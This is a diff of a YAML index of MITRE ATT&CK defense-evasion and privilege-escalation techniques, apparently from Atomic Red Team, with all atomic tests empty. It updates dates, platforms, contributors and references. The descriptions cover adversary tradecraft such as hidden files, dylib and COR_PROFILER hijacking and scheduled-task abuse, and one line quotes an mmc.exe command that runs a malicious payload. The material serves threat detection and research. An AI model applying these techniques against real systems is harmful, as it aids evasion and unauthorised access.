+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13607,7 +13895,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13635,48 +13923,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13685,6 +13936,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13693,20 +13947,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13763,6 +14048,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13773,13 +14059,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13838,11 +14123,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13882,8 +14166,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -13891,13 +14177,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -13928,9 +14214,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -13991,7 +14274,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14013,11 +14296,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14084,8 +14366,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14103,7 +14385,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14206,12 +14487,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14224,6 +14504,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14260,17 +14541,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14316,9 +14597,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14356,7 +14634,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14375,7 +14653,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14406,7 +14683,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14430,12 +14707,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14519,7 +14794,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14541,7 +14815,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14575,12 +14849,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14632,9 +14904,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14703,7 +14974,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14750,7 +15020,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14763,12 +15033,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -14847,7 +15118,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14869,7 +15140,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -14912,7 +15182,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -14936,8 +15206,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -14985,7 +15253,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15023,8 +15291,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15073,7 +15339,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15125,29 +15391,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15194,7 +15459,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15226,8 +15491,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15241,6 +15506,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15253,11 +15522,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15323,7 +15595,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15412,7 +15683,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15500,7 +15770,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15585,7 +15854,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
